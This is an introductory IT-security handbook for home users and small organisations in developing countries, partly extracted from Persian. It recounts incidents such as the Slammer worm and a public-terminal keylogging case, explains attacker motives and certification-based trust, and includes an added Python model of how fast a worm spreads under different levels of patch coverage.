‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﻧﺘﺨـﺎﺏ ﻛﻨﻴـﺪ‬
‫ﻛﻪ ﭘﻴﺎﻣﻬﺎ ﻭ ﺳﺎﻳﺮ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺭﺳـﺎﻟﻴﺘﺎﻥ ﺑـﺮﺍﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﺷـﻨﻮﺩ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﻧﺪ ﻳﺎ ﺧﻴﺮ‪.‬‬
‫ﺑﻌﻼﻭﻩ ﻏﺮﺑﺎﻝ ﻛﺮﺩﻥ ﭘﻴﺎﻣﻬﺎ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺷﻤﺎ ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻫﺮﭼﻨـﺪ‬
‫ﻛﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﻳﻚ ﻣﻨﺒﻊ ﺧـﺎﺭﺟﻲ ﺩﺭﺧﻮﺍﺳـﺖ ﻛﻨﻴـﺪ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ‬
‫ﻼ ﺍﺯ ‪ ISP‬ﺧـﻮﺩ ﺑﺨﻮﺍﻫﻴـﺪ ﻛـﻪ‬
‫ﺑﺮﺍﻱ ﺷـﻤﺎ ﺍﻧﺠـﺎﻡ ﺩﻫـﺪ ‪ -‬ﻣـﺜ ﹰ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﻧﺎﻣﻄﻠﻮﺏ ﺭﺍ ﺑﺮﺍﺳﺎﺱ ﺿـﻮﺍﺑﻄﻲ ﻛـﻪ ﺧﻮﺩﺗـﺎﻥ ﺗـﺪﻭﻳﻦ‬
‫ﻣﻲﻛﻨﻴﺪ ﻏﺮﺑﺎﻝ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺭﺳﺎﻧﺔ ﺗﻌﺎﻣﻠﻲ ﺍﺳﺖ؛ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ ﺁﺳـﺎﻧﻲ ﻭ ﺑـﺎ‬
‫ﺳﺮﻋﺖ ﭼﻨﺪﻳﻦ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺭﺍ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ‪ ،‬ﻳﺎ ﺍﺯ ﺍﻓﺮﺍﺩ ﺑﺴﻴﺎﺭﻱ‬
‫ﭘﻴﺎﻣﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭﻳﺎﻓﺖ ﻭ ﻳﺎ ﺑﻪ ﺁﻧﻬﺎ ﭘﻴﺎﻡ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﺯ‬
‫ﺁﻧﺠﺎ ﻛﻪ ﺯﻣﺎﻥ ﺍﻧﺘﻈﺎﺭ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺑـﺮﺧﻂ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﻣﻴـﺰﺍﻥ‬
‫ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺧﻂ ﺍﺭﺗﺒﺎﻃﻲ ﺷﻤﺎ ﺩﺍﺭﺩ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭﻳﺎﻓﺖ ﭘﺎﺳـﺦ‬
‫ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻛﻤﻲ ﻃﻮﻝ ﺑﻜﺸﺪ‪.‬‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻣﻲﺗﻮﺍﻧﺪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﺑﺘﺪﺍ ﺍﺳﺎﺱ ﺁﻥ ﺑﺮ‬
‫ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺑﻪ ﮔﺮﻭﻫﻬﺎﻱ ﻫﻤﻜﺎﺭ ﻭ ﻧﺴﺒﺘﹰﺎ ﻣـﺸﺎﺑﻪ ﻣـﺮﺩﻡ ﻗـﺮﺍﺭ‬
‫ﺩﺍﺷﺖ ﻭ ﺑﺠﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﻄﻤﺌﻦ‪،‬‬
‫ﺩﺭ ﺁﻥ ﺑﻪ ﻫﻤﻪ ﺍﻋﺘﻤﺎﺩ ﻣـﻲﺷـﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ‬
‫ﺍﻳﻨﺘﺮﻧــﺖ ﺭﺍ ﺑــﻪ ﺷــﻤﺎ ﺷﻨﺎﺳــﺎﻧﺪﻩ ﻭ ﻣﺠﻤﻮﻋــﻪﺍﻱ ﺍﺯ ﺍﻟﮕﻮﻫــﺎﻱ‬
‫ﺳــﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺘــﻲ ﺭﺍ ﺑــﺮﺍﻱ ﻛﻤــﻚ ﺑــﻪ ﺷــﻤﺎ ﺩﺭ ﻛــﺎﻫﺶ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬
‫ﺑﺮ ﺍﺳﺎﺱ ﻣﺸﺨـﺼﻪﻫـﺎﻱ ﻓـﻮﻕ ﺗـﺎﻛﻨﻮﻥ ﺑﺎﻳـﺪ ﺩﺭ ﺫﻫـﻦ ﺧـﻮﺩ‬
‫ﺗﺼﻮﻳﺮﻱ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻫـﺮ ﻧـﻮﻉ ﻓﻌﺎﻟﻴـﺖ‬
‫ﻣﺠﺎﺯ ﺍﺳﺖ ﻭ ﭼﻴﺰﻱ ﺩﺭ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺖ ﻧـﺪﺍﺭﺩ ﻭ ﺗﺤـﺖ ﻛﻨﺘـﺮﻝ‬
‫ﻧﻴــﺴﺖ‪ .‬ﺍﻳــﻦ ﻓــﻀﺎﻱ ﺑــﺎﺯ ﺑﺨــﻮﺑﻲ ﺭﻳــﺸﻪﻫــﺎﻱ ﭘﮋﻭﻫــﺸﻲ ﻭ‬
‫ﺩﺍﻧﺸﮕﺎﻫﻲ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﻓﻮﺍﻳﺪ ﺁﻧﺮﺍ ﺑـﺮﺍﻱ ﺗﻤـﺎﻣﻲ‬
‫ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﻣﻲ ﻧﻤﺎﻳﺎﻧﺪ‪ .‬ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺎ ﻫـﺪﻑ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﻣﻨﻴـﺖ‬
‫ﻃﺮﺍﺣﻲ ﻧﺸﺪﻩ‪ ،‬ﺑﻠﻜﻪ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺛﻤﺮﺍﺕ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣـﺸﺘﺮﻙ‬
‫ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻣﻴـﺰﺍﻥ ﺁﺯﺍﺩﻱ ﻋﻤـﻞ ﻓﺮﺻـﺘﻬﺎﻳﻲ ﺑـﺮﺍﻱ‬
‫ﺍﻓﺮﺍﺩ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﺷﺒﻜﻪﻫﺎ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨـﺪ ﻭ‬
‫ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻣﺎ ﺍﺑﺘـﺪﺍ ﺑﺎﻳـﺪ ﻣﺎﻫﻴـﺖ‬
‫ﺍﻳﻦ ﻧﻮﻉ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﻫﺎ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺷﺒﻜﻪﻫﺎﻱ ﺧﻮﺩ‬
‫ﺭﺍ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﻧﻬﺎ ﺍﻣﻦ ﻛﻨﻴﻢ‪.‬‬
Issues in Information Security

The concepts of computer, network and data security in cyberspace are the same as in the real world, but the mechanisms used to implement them differ. For example, to use accounts that grant access to information or services we have a username and password instead of physical or electronic keys, and instead of sealed envelopes for conveying information we can encrypt the data in transit so that it cannot be read by unknown parties.

Comparing the real world with cyberspace, we see similar violations of trust and confidentiality. In both there can be false addresses and forged signatures. In both it is possible to present false or misleading information. People can also be led astray by information, whether accidentally or deliberately, so that it becomes impossible to tell which information is important and verifiable.[44] Finally, in both worlds confidential information can be accessed without authorization and used for illegal purposes.

[44] The captain of the famous ship Titanic used early radio to communicate between ship and shore. The radio operator, who was on his first voyage, was receiving so many personal messages that one important message, a warning about a large iceberg in the ship's path, was not recognized as important and worth following up. The result was that the ship struck the iceberg and sank a few hours later.

Despite all these similarities, there are three major differences between the two worlds:

First: any breach of security in cyberspace can happen very quickly; by the time you realize what has happened to your assets, it may already be too late to prevent the damage. Not all attacks are fast, however; some can be observed while they are under way and take a long time to succeed. The lesson is that security and deterrent measures must be strong enough to detect a breach while it is occurring or after it has occurred.

Consider the following reports on the Slammer worm, which severely disrupted the Internet in early 2003. The worm infected systems in many countries on all five continents, and most of the damage fell on developing countries:

"Slammer (sometimes called Sapphire) is the fastest computer worm ever released in the history of computing. As it began spreading across the Internet, more than 90% of vulnerable hosts were infected within 10 minutes, disrupting financial transactions and the transport operations of government institutions and leaving no room for human response..."

"Before 05:30 UTC on Saturday, 25 January 2003, Slammer broke into Internet-connected computers running Microsoft SQL Server or Microsoft SQL Desktop Engine (MSDE) 2000 by exploiting a buffer overflow vulnerability, and quietly set about infecting all host computers. David Litchfield discovered this vulnerability in July 2002, and Microsoft had released a patch for it before the Slammer worm appeared.[49]"

"According to official reports, the worm used this vulnerability to infect at least 75,000 hosts, although the real number is far higher, and caused severe disruption of the Internet along with unforeseen consequences such as cancelled airline flights, interference with elections, and ATM failures.[50]"

[49] http://www.microsoft.com/security/slammer.asp
[50] Moore, Paxson, Savage, Shannon, Staniford and Weaver, "Inside the Slammer Worm," IEEE Security and Privacy, Vol. 1, No. 4, July/August 2003, pp. 33-39.

Second: you do not need to be physically present somewhere to compromise security in cyberspace. Someone in Europe, for example, can compromise the computers of a target in India as easily as someone in India who is only a street's width away from that target. A security threat in cyberspace can originate anywhere on the network and be directed at a specific, known target, and the target may equally have been chosen at random. These dangerous threats force us to change how we think about security. It can be said that there is no value in the Digital Millennium Copyright Act declaring the design of lock-breaking software illegal, because national and international copyright bodies are still working out enforcement approaches for this and other data-protection issues.[51]

[51] For recent commentary on this document, see: U.S. Copyright Office Digital Millennium Copyright Act Study: http://www.copyright.gov/reports/studies/dmca/dmca_study.html; DMCA: http://www.copyright.gov/legislation/hr2281.pdf

Third: cyberspace has created a powerful but complex environment in which responsibility for security is shared among several players. If you are a customer of an ISP, for example, you have various ways to protect yourself and your personal computer, but you cannot control the security policies of your ISP or how they are implemented. Likewise, you cannot control your customers' software, even if you interact closely with their systems. You therefore need a strategy for protecting your assets, knowing that being connected to the outside world means you cannot eliminate every vulnerability in the network.
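The speed argument in the first difference above, and the figures reported for Slammer (at least 75,000 infected hosts, more than 90% of vulnerable hosts within 10 minutes, a patch available beforehand), can be made concrete with a simple epidemic model of a random-scanning worm. The following Python model is an added example, not part of the handbook; the per-host scan rate, the single initial infection, uniform random scanning and the patch-coverage scenarios are assumptions, and the model ignores bandwidth saturation.

```python
"""Random-scanning worm epidemic model: why an unpatched population is overrun
faster than people can react, and how patch coverage changes the timeline.

Assumptions (not from the handbook): SCANS_PER_SEC, one initially infected
host, uniform random scanning of the IPv4 space, no bandwidth saturation.
The 75,000-host population is the lower bound quoted in the text.
"""
import math

ADDRESS_SPACE = 2 ** 32      # IPv4 addresses a random scanner can choose from
VULNERABLE_HOSTS = 75_000    # "at least 75,000 hosts" quoted in the text
SCANS_PER_SEC = 4_000        # assumed probes per second per infected host


def contact_rate(vulnerable, scans_per_sec=SCANS_PER_SEC):
    """Expected new infections per second caused by one infected host
    while almost every vulnerable host is still uninfected."""
    return scans_per_sec * vulnerable / ADDRESS_SPACE


def doubling_time(vulnerable, scans_per_sec=SCANS_PER_SEC):
    """Seconds for the infected population to double in the early phase."""
    return math.log(2) / contact_rate(vulnerable, scans_per_sec)


def closed_form_time(vulnerable, fraction, seed=1, scans_per_sec=SCANS_PER_SEC):
    """Logistic-growth solution: seconds until `fraction` of hosts are infected."""
    beta = contact_rate(vulnerable, scans_per_sec)
    a0 = seed / vulnerable
    return math.log((fraction / (1 - fraction)) * ((1 - a0) / a0)) / beta


def simulate(vulnerable, fraction, seed=1, scans_per_sec=SCANS_PER_SEC,
             step=0.1, limit=24 * 3600):
    """Step the expected number of infected hosts forward in time and return
    the first time (seconds) at which `fraction` of hosts are infected,
    or None if that does not happen within `limit` seconds."""
    infected, t = float(seed), 0.0
    target = fraction * vulnerable
    while t <= limit:
        if infected >= target:
            return t
        # Probability that one random probe lands on a still-clean vulnerable host
        p_hit = (vulnerable - infected) / ADDRESS_SPACE
        infected = min(vulnerable,
                       infected + infected * scans_per_sec * step * p_hit)
        t += step
    return None


def patch_scenarios(coverages=(0.0, 0.5, 0.9, 0.99)):
    """Time to 90% infection of the remaining vulnerable hosts when a given
    share of the original population had installed the patch beforehand."""
    rows = []
    for patched in coverages:
        remaining = round(VULNERABLE_HOSTS * (1 - patched))
        rows.append((patched, remaining,
                     doubling_time(remaining),
                     closed_form_time(remaining, 0.9)))
    return rows


if __name__ == "__main__":
    print(f"doubling time, nobody patched: {doubling_time(VULNERABLE_HOSTS):.1f} s")
    print(f"simulated time to 90%:         {simulate(VULNERABLE_HOSTS, 0.9):.0f} s")
    for patched, remaining, dbl, t90 in patch_scenarios():
        print(f"patched {patched:4.0%}  vulnerable {remaining:6d}  "
              f"doubling {dbl:7.1f} s  90% after {t90 / 60:6.1f} min")
```

Under these assumptions the model overruns 90% of an unpatched population in a little over three minutes, while 90% patch coverage stretches the same milestone to roughly 26 minutes, which is the window that detection and response have to work with.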
What are the likely risks in cyberspace? If you take no security precautions at all, some of the possible consequences are:

Destruction of information - Data stored on your computer may be deleted. It can usually be recovered, but the process is time-consuming and likely to be incomplete. If you are a government agency, your operations may be disrupted during this period.

Theft of information and invasion of privacy - You may learn of the theft immediately or only after some delay, and learning of it is quite separate from finding out who has your data, what information they hold, or what they will do with it. If a large amount of your personal information has been stolen, the thief very probably has your key information, which can have unknown and potentially dangerous consequences.

Loss of information integrity - Information on your computer may be altered and tampered with without your knowledge. Depending on the kind of information you hold, the consequences may be short-lived or long-lasting. If the data includes financial records, customer information, order status or personnel files, the consequences of losing its integrity can be very costly and damaging.

Compromise of network integrity through other systems and networks - Although you have not been attacked directly in this case, other computers that you access may be attacked, and this can affect you as well. If you are a financial or credit institution, for example, you will be unable to complete your financial transactions while the data is being recovered.

Keystroke logging - Hidden software can be installed on your computer that records the keys you press and sends them to another computer. This can compromise your access to external resources, such as access to a protected web server or a mail server, financial transfers, or the receipt of confidential information. The thief can obtain your authentication tokens, credit card number and passwords and later use them for personal gain.

Denial of access - You may be denied access to your own information even though it has not been erased. For example, your information may turn up in encrypted form, with only the attacker holding the decryption key.

The cost of recovering successfully from any of these attacks is considerable, and in some cases recovery appears impossible. If you run an advertising media business that depends heavily on its electronic data resources, a destructive attack could bankrupt your organization. Note that the Slammer worm infected systems on which the patch provided by Microsoft had not been installed.

One security breach that went on successfully for more than a year illustrates the novel ways in which security in cyberspace can be compromised:

"Associated Press (New York) - For more than a year, Juju Jiang recorded what people typed on the Internet terminals at Kinko's stores in New York without their knowledge. Jiang had secretly installed software in at least fourteen Kinko's stores that could log people's keystrokes. Over its year of operation the software captured more than 450 usernames and passwords, which he used to access and even open online bank accounts.

The case, which earlier this month led to a penalty being set for Jiang following his arrest, highlights the risks of using public Internet terminals in Internet cafés, libraries, airports and other establishments. Neel Mehta, a research engineer at Internet Security Systems, warns: 'When using any public terminal, use your common sense. For many everyday communications, such as connecting to the web, you may have no problem, but before doing anything that might be sensitive, think a little first.' Jiang was caught when, according to court records, he used one of the stolen passwords to access a computer running GoToMyPC, software that lets people reach their own computer remotely from anywhere. The person whose computer had GoToMyPC installed was at home at the time and suddenly saw the cursor start moving around the screen and files opening by themselves. He then saw a bank account being opened and his name being entered at an online shopping service. Jiang, who is awaiting sentencing, ultimately admitted on 14 February 2001 to installing hidden keystroke-logging software at Kinko's stores.[60]"

[60] Associated Press Bulletin, July 23, 2003

This book is a guide to security for users both at home and in business, and so it contains extensive information on security topics such as risks, the consequences of attacks, ways of protecting computers, networks and data, and the policies that should be considered before an effective security strategy is implemented. The ultimate aim of the book is not to drive users away from the resources offered by the new digital environments, but to empower them to enjoy this new world safely and securely. In short, the purpose of publishing this book is to develop a realistic and thorough understanding of the nature of today's security problems, in order to reduce vulnerabilities and build on the strengths of information and communication technology.

What Motivates Security Offenders?

In real life there are many motives for committing crimes against a person or an organization. Among the main ones are revenge against someone the offender believes has wronged him, and financial gain.

The same kinds of offenses exist in cyberspace, but wrongdoing in this space is of a different kind. For one group of people, commonly called "crackers", who are able to break into other people's accounts or harm others for fun and entertainment, cyberspace is a challenging environment. In other words, they take pride in their ability to break into user accounts, databases and network equipment. Behavior of this kind is very rare in the real world.

Crackers usually regard what they do as "victimless crime". Their argument runs: if an account or database is broken into but nothing is changed or stolen, who has been harmed? In reality they ignore the legal implications and consequences of what they do, and they are indifferent to the sense of insecurity their activities create in their victims. The real-world equivalent would be someone entering your home and being able to do so again whenever he liked. You would certainly find that intolerable.

Unfortunately, the Internet is a great help to those who violate security. Some crackers have intrusion tools that allow even novice intruders to exploit certain vulnerabilities successfully. Such tools are commonly posted to well-known Usenet newsgroups, where anyone can find and use them. While many of these tools may be harmless, no one can ever be sure exactly what the effects of using any one of them will be. Moreover, some of these supposedly harmless tools can be modified so that they damage the computers and accounts accessed through them. One such case is described below:
Advisory CA-203-18 of the Computer Emergency Response Team (CERT) documents the latest Windows hole, and CNet has reported that exploitation of this vulnerability to break into Windows paves the way for the sudden emergence of another severe worm attack:

"Security researchers have warned that a group of hackers has released a program designed to exploit a major Windows flaw, opening the way for a large-scale attack by the end of this week. The warning was issued on Friday, after Chinese hackers from the security group X Focus released to several security centers around the world the source code of a skillfully designed program that broke into computers running the Windows operating system.

The X Focus program exploits a flaw in Microsoft's operating system and lets intruders break into a system remotely. Several experts have described the flaw as the biggest ever found in Windows.[61]"

[61] CNet News.com, July 25, 2003

The growing number of attacks carried out by relatively unskilled people is likewise a long and continuing story.

Not all security breaches are specific to computers and the Internet, of course. Automated teller machines (ATMs) have also been used to steal confidential information. In one case (in the US state of Connecticut) thieves installed a device resembling an ATM in a shopping center. When people inserted their card and entered their PIN to withdraw money, the fake machine stored the codes, making later unauthorized access to those accounts very easy; because it was not connected to any real financial institution, however, it could not complete the transactions. In another case thieves used ATMs in such a way that money could actually be transferred, and then some time later carried out thefts using the recorded information.
Although most visible crime in cyberspace is committed by individuals, organizations and institutions are also capable of abusing the properties of this space to further their own organizational goals. Organized crime may manipulate the Internet to obtain the results it wants, and in doing so may also commit offenses against others. Some organizations might wish to manipulate the outcome of a poll, or even an election, to get the result they want. Some institutions have already invested heavily in this and may be able to keep it up vigorously for a long time.

The potential benefits of the new digital age are clearly immense. It is very important that we protect these benefits by securing our physical environment, infrastructure, computers, communication lines and information resources. The first step is to acquire an adequate and accurate understanding of the technology, which will help us make sensible decisions about how to achieve an appropriate level of security. Many of us play several roles here: we may use these resources as ordinary users, be responsible for the digital systems and services of an organization, or be interested in working with government on policies that support security.
In each of these roles we all share responsibility for achieving an adequate level of security. Unfortunately, security in a complex environment is usually only as strong as that environment's weakest component; we must therefore make sure that the components under our control are strong enough that even the weakest of them can withstand existing threats.

The Importance of Security for Small and Medium-Sized Organizations in Developing Countries

Although security matters to everyone, it is especially important for small and medium-sized organizations in developing countries. The rewards of entering the global market with the help of information and communication technology are very attractive, but the risks of doing so insecurely are equally serious.

In many lines of business, manual operations have given way to computer-based management. Stand-alone computers can be used for a certain period in many economic sectors of developed countries. As new computing resources are introduced, managers are moving toward acquiring knowledge about practical matters such as backup, network maintenance, software updates and computer auditing. Success in all of these requires familiarity with computers, networks and the concepts of information security.

With the arrival of network connectivity and the opportunity to enter electronic commerce, system processes and management processes have to be viewed from two different perspectives. Stand-alone systems are generally product-oriented or process-oriented (for example inventory and orders, or processes such as production, general ledger, and accounts payable and receivable), whereas successful online e-commerce systems are organized differently. To succeed, such systems must be designed around the customer, following the customer through searching for and evaluating products, placing an order, completing the financial transaction and tracking the shipment. Products and processes still matter in these systems, but they take second place to the need to follow the customer's behavior on the web site and carry out whatever transaction the customer requests. This redesign is essential for success, but it requires a different approach to handling customers' purchase requests, one which, if implemented without sufficient care, may open the way to new kinds of security breach.

Small and medium-sized organizations should be aware that reorienting their business systems to use the Internet brings new risks. One of these is newer than all the rest: the possibility that the company's assets will be stolen and offered for sale. In an age when the goods and services being sold are information products, they may be illegally obtained and distributed for free or on the black market, in which case the profit goes to the thieves rather than to the company that produced the information.

The most prominent example of illegal copying today is in the music industry, where it has led to the distribution of pirated products, mostly on compact disc. Protecting digital assets remains an unsolved problem, although much effort has gone into solving it. Nearly perfect copies of digital information products have long been made, because they are easy to copy and a sale does not depend on having the original. The technology used in the music industry can be applied in other settings as well, which means that trade secrets or other confidential information can also be obtained and published in ways that do severe damage to the business or industry concerned. Valuable assets need adequate and appropriate protection. That level of security can be achieved, but the risks and working methods of a company engaged in electronic commerce differ from those of a company trading in the traditional way.

Towards a New Concept of Trust

The new digital environment requires us to rethink our definition of trust. In the real world we use a wide range of criteria to decide how far to trust a person, a process or an organization; for example, we check what we observe against our previous experience and knowledge. When information is exchanged in cyberspace, most of the non-verbal cues of communication are lost. When we receive an e-mail or read a web page, we cannot always tell whether the information is accurate or whether checking it would show it to be wrong. Nor do we know whether any errors are the result of carelessness or of deliberate attempts to deceive us. Lacking such information, we do not even know whether the author of a message is the person he or she claims to be.

Deception certainly occurs in the real world as well, but it is usually easier to establish the truth when people are physically present and places really exist.

Fortunately, certification authorities have done much to address this aspect of security in cyberspace. These bodies formally issue certificates that identify individuals and organizations. The same idea exists in the real world: if you hold a national passport, the government of a country has certified your identity, and the passport is a token you can use to prove who you are. Similarly, a driver's license means that a national or regional government agency has issued you a permit that both confirms your identity and authorizes you to drive a vehicle. Credit card companies likewise vouch for you by issuing credit cards. Your employer or school may also certify you with an identity card, which may give you access to particular services reserved for the employees or students of a particular organization.

Clearly, certification authorities in the real world are few in number. In general, each of them certifies you for a particular purpose. The thoroughness of the identity check varies from one authority to another; some may require full proof of your identity, while others may accept whatever you tell them.

Certification authorities in cyberspace share these characteristics. Different levels of identity verification exist for different degrees of assurance, and each certificate is valid only at its own level. That is why, although it might seem that a single certification authority would suffice for every purpose, there are several certification authorities in the virtual world. In addition, with electronic certification these certificates can be signed electronically, giving assurance that a transmitted certificate is correct and genuine. These certification systems are more robust than the empirical and intuitive methods used in the real world. In the digital world, more robust methods are needed to establish the trust required to support business transactions and financial transfers over electronic networks.

Governments have an important role in ensuring that suitable mechanisms exist for the new models of trust to work and be used. The ability of small and medium-sized organizations to transact electronically depends on this trust. In some countries governments believe that government agencies should act as certification authorities; in others, governments believe that the role should be left to the private sector. Whatever the implementation details, the purpose of these authorities is clear. Government policy can facilitate trust mechanisms so that individuals, organizations and their individual users can take part in electronic commerce with other countries as well.
‫ﺑﺨﺶ ﺍﻭﻝ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺟﻤﻊﺑﻨﺪﻱ‬
All individuals and countries benefit from information technology, but this technology has a special appeal for developing countries and can speed up their integration into the global economic community. The technology is still in its early stages but is advancing rapidly. Unfortunately, like other technological advances, the Internet can be used for both legitimate and illegitimate purposes. As we have seen, the cyber world contains criminals and vandals who use the Internet to attack individual and organizational users.
The concept of "cyber safety" is an important one. The examples in this chapter, the number of incidents reported to CERT, and the new incidents reported daily in the press all show why awareness of security issues matters and why steps must be taken to ensure the protection of personal computers, data and commerce.
This book contains a collection of security best practices that help in implementing the policies and procedures relevant to your particular situation. It also introduces many printed and electronic references covering specific aspects of IT security, as well as organizations that specialize in IT security issues. All of these resources will be useful to individuals and organizations seeking to broaden their awareness of security in the networked world.
These conditions are of particular importance in developing countries. Foreign direct investment, trust and reliability in these countries depend on the level of security and on the successful implementation of technology and its infrastructure. Governments, organizations and individual users all play a significant role in securing countries' information and electronic assets. Understanding the threats is very useful, and appropriate action based on that understanding can create a trustworthy environment and let the inhabitants of the planet enjoy the benefits of the new digital age as fully as possible.
Digital technology provides exciting new tools, each of which can play a significant role in education, health, welfare, commerce and other sectors of civil society.
Part Two: IT Security and Individual Users
Chapter 1. Introduction
Chapter 2. Understanding Security Concepts
Chapter 3. Computer and Data Security
Chapter 4. Operating System and Application Software Security
Chapter 5. Malicious Software
Chapter 6. Security of Network Services
Chapter 7. Tools for Improving Security
Chapter 8. Special Considerations for Different Platforms
Appendix 1. Introduction to Encoding and Encryption
Appendix 2. TCP/IP
Appendix 3. Glossary of Technical Terms
Chapter One
Introduction
Part Two concentrates on securing individual computer users, from novices to experts, and the first issue to be explained is how to protect personal computers.
Computers can be used safely, but doing so requires information, cleverness and great care. The language used in this discussion sometimes involves unfamiliar concepts. Some of the terms and definitions are given in the appendix at the end of this part, and some are also set out in full in Annex 1 of the book.
The first step in presenting a sound security strategy is to define what "proper use" of personal computers and "protection" of them mean. If this is what you are looking for too, make sure that:
• your data and programs are changed or deleted only when you intend it;
• computer programs behave as their designer or programmer intended (except for software bugs, whose presence in programs is unintended);
• no one can use your data, computer or network without your permission;
• the computer does not unintentionally spread virus-infected files;
• no one is able to observe the changes you make on the computer;
• no one can gain access to your data, whether on wireless or wired networks;
• on the systems or websites you access, no one is able to steal usernames[1] and passwords[2];
• if you enter your credit card number or bank account information over the Internet, that data will be fully secure (of course, you will have no control over what happens at the other end of the connection);
• and so on.
If security is neglected on personal computers, various consequences follow: they may be an annoyance that costs nothing, or they may impose a heavy cost and take up a great deal of time. Where protecting computers is regarded as the person's profession, the resulting problem may put his or her job at risk. In every case one must assess the risk, adopt the necessary security plan and carry it out. The details presented here on IT security make it possible to control every security aspect of personal computers.
If the guidance given in this book is also applied, risk can be reduced to an acceptable level and the changing world of information technology can be used to best advantage.
Naturally, presenting every aspect of personal computer security would take hundreds of pages, but readers often have little inclination to read voluminous material. This text presents a summary of the information users need in order to understand and implement personal computer security. The references listed in the appendices, which include electronic resources, related organizations and printed documents, can also be helpful and encourage the user to study IT security further.
[1] Username
[2] Password
Chapter Two
Understanding Security Concepts
Overview
This chapter explains why security and the protection of networks and computers are necessary. It covers the consequences of a security breach, initial measures for dealing with one, and a few technical definitions of security topics. Fuller definitions are given in Appendix 1 of this chapter and in Annex 1 of the book.
Why are security measures necessary?
In the earliest days of computing, shared systems used only a username to identify people, and no password was required. After malicious users began abusing this arrangement, passwords were added to those systems. Today administrators must think about network and computer security more than ever. The main reasons are:
• The value of investment in hardware and software - Computers and software packages are very expensive, and replacing them is costly and difficult. Even if software and hardware are not completely destroyed in a security incident, security problems may force us to reinstall all the software, after which all the basic requirements may have to be defined again. This takes a great deal of time, especially if the person responsible lacks sufficient technical knowledge.
• The value of personal data - Personal data may have little monetary value, yet losing it can be very damaging, and recreating the information can take a great deal of time (see the definitions relating to identity theft[3]).
• The value of organizational data - This data may include customer lists, financial projects, or business programs written by the user.
• Threats from computer criminals - As technology has advanced, a group of vandals who profit from stealing computer data has also emerged. In some cases this is done purely for pleasure and entertainment, and some people do it only to show off to their friends; but in other cases it is done for personal and organizational gain (stealing credit card information or entering into fraudulent transactions). In all of these cases such people cause damage and spread distrust, and on a larger scale they create critical problems that harm people and their jobs. It must be said that since the Internet became available to users worldwide, pursuing and stopping attackers, although still possible, has become very complicated.
Why is security usually weak?
Software is often produced without security in mind. There are several reasons for this:
• Negligence - Programmers and designers are unaware of the importance of security.
• Low priority - Until recently, even those who were aware of security issues did little about them, so security did not receive the attention it needed.
• Time and cost constraints - Some people assume that security measures in design, coding and testing during software development carry a heavy cost and take a great deal of time.
• Programmers' lack of discipline - In programming work the same mistakes are repeated many times and give rise to security flaws.
